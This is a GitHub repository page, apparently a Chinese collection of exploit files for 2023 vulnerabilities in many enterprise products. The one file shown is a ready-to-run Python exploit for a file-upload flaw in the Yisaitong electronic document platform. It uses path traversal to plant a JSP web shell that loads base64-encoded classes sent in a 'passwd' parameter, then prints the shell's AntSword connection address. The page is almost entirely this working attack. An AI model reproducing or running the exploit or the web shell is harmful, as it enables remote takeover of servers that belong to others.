Files

Apache
assets
360 新天擎终端安全管理系统存在信息泄露漏洞.md
360天擎 - 未授权与sql注入.md
Apache Spark命令执行漏洞（CVE-2023-32007）.md
Apache Struts2 CVE-2023-50164.md
Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678.md
Apache-Submarine-SQL注入漏洞CVE-2023-37924.md
Appium Desktop CVE-2023-2479漏洞.md
Array VPN任意文件读取漏洞.md
CVE-2023-4357-Chrome-XXE漏洞.md
Cisco IOS XE CVE-2023-20198权限提升漏洞.md
Confluence 未授权提权访问漏洞.md
Confluence身份认证绕过(CVE-2023-22518).md
Coremail邮件系统未授权访问获取管理员账密.md
Craft CMS远程代码执行漏洞CVE-2023-41892.md
Dedecms v5.7.111前台tags.php SQL注入漏洞.md
F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md
H3C Magic B1STV100R012 RCE.md
H3C网络管理系统任意文件读取漏洞.md
HiKVISION 综合安防管理平台任意文件上传漏洞.md
Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞.md
I Doc View任意文件上传漏洞.md
IP-guard WebServer 远程命令执行漏洞.md
JAVA Public CMS 后台RCE漏洞.md
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
JeecgBoot漏洞.md
Joomla 未授权漏洞CVE-2023-23752.md
JumpServer未授权漏洞.md
Kuboard默认口令.md
Metabase validate 远程命令执行漏洞（CVE-2023-38646）.md
OfficeWeb365 文件上传漏洞.md
Openfire身份认证绕过漏洞(CVE-2023-32315).md
Panabit iXCache网关RCE漏洞CVE-2023-38646.md
Panel loadfile 后台文件读取漏洞.md
QQ客户端存在远程命令执行漏洞.md
README.md
RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md
Smart S85F 任意文件读取.md
Splunk Enterprise 远程代码执行漏洞 (CVE-2023-46214).md
SysAid远程命令执行漏洞（CVE-2023-47246）.md
TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md
TP-LINKTL-WR940N 命令执行漏洞（CVE-2023-33538).md
Tenda路由器账号密码泄露.md
WEBMAIL存在任意用户登录漏洞.md
WeiPHP>=5.0 SQL注入漏洞.md
WinRAR CVE-2023-38831.md
Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553).md
XXL-JOB默认accessToken身份绕过漏洞.md
iDocView upload接口任意文件读取.md
jshERP信息泄露漏洞.md
pyLoad远程代码执行漏洞.md
smanga存在未授权远程代码执行漏洞.md
万户 ezOFFICE DocumentEdit.jsp SQL注入.md
万户OA-upload任意文件上传漏洞.md
万户ezoffice wpsservlet任意文件上传漏洞.md
万户协同办公平台存在未授权访问漏洞.md
万户协同办公平台接口存在文件上传漏洞.md
中远麒麟堡垒机SQL注入.md
云匣子堡垒机fastjson漏洞.md
云时空社会化商业ERP任意文件上传.md
亿赛通电子文档安全管理系统远程命令执行漏洞.md
亿赛通电子文档平台文件上传漏洞.md
任我行 CRM SmsDataList SQL注入漏洞.md
企望制造 ERP comboxstore.action 远程命令执行漏洞.md
华为Auth-Http Serve任意文件读取.md
基于Typora DOM的跨站点脚本导致远程代码执行（CVE-2023-2317）.md
多个防火墙产品RCE.md
大华智慧园区管理平台任意文件读取.md
大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞.md
大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
大华智慧园区综合管理平台文件上传漏洞.md
大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md
天钥网关前台SQL注入.md
奇安信360天擎getsimilarlistSQL注入漏洞.md
契约锁电子签章系统RCE.md
奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞.md
好视通视频会议系统 toDownload.do接口任意文件读取漏洞.md
安美数字酒店宽带运营系统SQL注入漏洞.md
宏景OA文件上传.md
帆软报表 V8 get_geo_json 任意文件读取漏洞.md
广州图创图书馆集群管理系统存在未授权访问.md
广联达oa sql注入漏洞 .md
广联达oa 后台文件上传漏洞.md
思福迪运维安全管理系统RCE漏洞.md
新开普掌上校园服务管理平台service.action远程命令执行.md
昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
明源云 ERP ApiUpdate.ashx 文件上传漏洞.md
易宝OA ExecuteSqlForSingle SQL注入漏洞.md
易思智能物流无人值守系统5.0存在任意文件上传漏洞.md
智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞.md
某x服应用交付系统命令执行漏洞.md
某信景云终端安全管理系统 login SQL注入漏洞 .md
某凌OA前台代码执行.md
某友时空KSOA PayBill SQL注入漏洞.md
某和OA C6-GetSqlData.aspx SQL注入漏洞.md
某微 E-Cology 某版本 SQL注入漏洞.md
某微E-Office9文件上传漏洞 CVE-2023-2523.md
某微E-Office9文件上传漏洞 CVE-2023-2648.md
某恒明御漏洞.md
某服 sxf-报表系统命令执行漏洞.md
某盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md
某盟 SAS堡垒机漏洞.md
某盟sas安全审计系统任意文件读取漏洞.md
某神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md
某神 SecSSL 3600安全接入网关系统任意密码修改漏洞.md
某联达oa 后台文件上传漏洞.md
汉得SRM tomcat.jsp 登录绕过漏洞.md
泛微 HrmCareerApplyPerView sql注入漏洞.md
泛微E-MobileServer远程命令执行漏洞.md
泛微e-cology9_SQL注入-CNVD-2023-12632.md
泛微e-office 未授权访问.md
泛微云桥 e-Bridge addTaste接口SQL注入漏洞.md
浙大恩特客户资源管理系统文件上传和sql注入漏洞.md
海康威视IVMS-8700 fastjson命令执行漏洞.md
海康威视综合安防管理平台信息泄露.md
海康威视运行管理中心fastjson漏洞.md
深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md
深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞.md
深信服下一代防火墙NGAF RCE漏洞.md
深信服下一代防火墙NGAF任意文件读取漏洞.md
深信服数据中心管理系统 XML 实体注入漏洞.md
用友 GRP U8 license_check.jsp 存在SQL注入.md
用友 GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞.md
用友 NC Cloud jsinvoke 任意文件上传漏洞.md
用友 NC uapws wsdl XXE漏洞.md
用友GRP-U8存在XML注入漏洞.md
用友NC word.docx任意文件读取漏洞.md
用友NC-Cloud uploadChunk 任意文件上传漏洞.md
用友NC的download文件存在任意文件读取漏洞.md
用友U8-Cloud upload任意文件上传漏洞.md
用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md
用友nc-cloud RCE.md
睿因 Wavlink WL_WNJ575A3 远程命令执行.md
禅道 16.5 router.class.php SQL注入漏洞.md
禅道 v18.0-v18.3 存在后台命令执行漏洞.md
红帆OA iorepsavexml.aspx 文件上传漏洞.md
红帆OA zyy_AttFile.asmx SQL注入漏洞.md
绿盟 NF 下一代防火墙任意文件上传漏洞.md
网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞.md
网神防火墙 app_av_import_save文件上传漏洞.md
联想网盘存在任意文件上传漏洞.md
致远M1 usertokenservice 反序列化RCE漏洞.md
致远OA M3 Server 反序列化漏洞.md
致远OA wpsAssistServlet任意文件读取漏洞.md
致远OA_V8.1SP2文件上传漏洞.md
致远OA任意管理员登录.md
致远OA前台任意用户密码修改漏洞.md
蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞.md
蓝凌EKP前台授权绕过导致文件上传.md
蓝凌OA treexml.tmpl 远程命令执行漏洞.md
蓝凌OAsysUiComponent 文件存在任意文件上传漏洞.md
赛思 SuccezBl前台任意文件上传.md
迪普DPTech VPN 任意文件读取.md
通达OA down.php接口存在未授权访问漏洞.md
通达OA get_datas.php前台sql注入.md
通达OA header身份认证绕过漏洞.md
通达OA sql注入漏洞 CVE-2023-4165.md
通达OA sql注入漏洞 CVE-2023-4166.md
速达软件全系产品存在任意文件上传漏洞.md
金和OA任意文件读取漏洞.md
金山EDR RCE漏洞.md
金山WPS RCE.md
金山终端安全系统V9.0 SQL注入漏洞.md
金山终端安全系统V9任意文件上传漏洞.md
金蝶Apusic应用服务器任意文件上传.md
金蝶EAS myUploadFile任意文件上传.md
金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞.md
金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md
金蝶云星空 CommonFileserver 任意文件读取漏洞.md
锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
锐捷-EG易网关存在RCE漏洞.md
锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md
青藤云 EDR 权限提升漏洞.md
飞企互联 FE 业务协作平台存在参数文件读取漏洞 .md

亿赛通电子文档平台文件上传漏洞.md

wy876

Create 亿赛通电子文档平台文件上传漏洞.md

Aug 19, 2023

e899ceb · Aug 19, 2023

History

亿赛通电子文档平台文件上传漏洞

import requests
from urllib.parse import urljoin
import sys
payload="/CDGServer3/fileType/importFileType.do?flag=syn_user_policy"
request_file = {'fileshare':(('/..\..\..\..\webapps\ROOT\\tool.jsp',"""<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>"""))}
def title():
    print("""
    亿赛通文件上传
    """)
def exp(url):  
    url1=urljoin(url,payload)
    req=requests.post(url=url1,files=request_file,verify=False,timeout=5)
    shell=urljoin(url,"tool.jsp")
    if(req.text.find("xmlFail")>0):
        print("成功！")
        print("蚁剑连接地址%s,密码passwd"%shell)
if __name__ == '__main__':
    title
    if(len(sys.argv) !=2):
        print("eg:python exp.py url")
    else:
        exp(sys.argv[1])

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Files

亿赛通电子文档平台文件上传漏洞.md

亿赛通电子文档平台文件上传漏洞.md

亿赛通电子文档平台文件上传漏洞

Files

亿赛通电子文档平台文件上传漏洞.md

Latest commit

History

亿赛通电子文档平台文件上传漏洞.md

File metadata and controls

亿赛通电子文档平台文件上传漏洞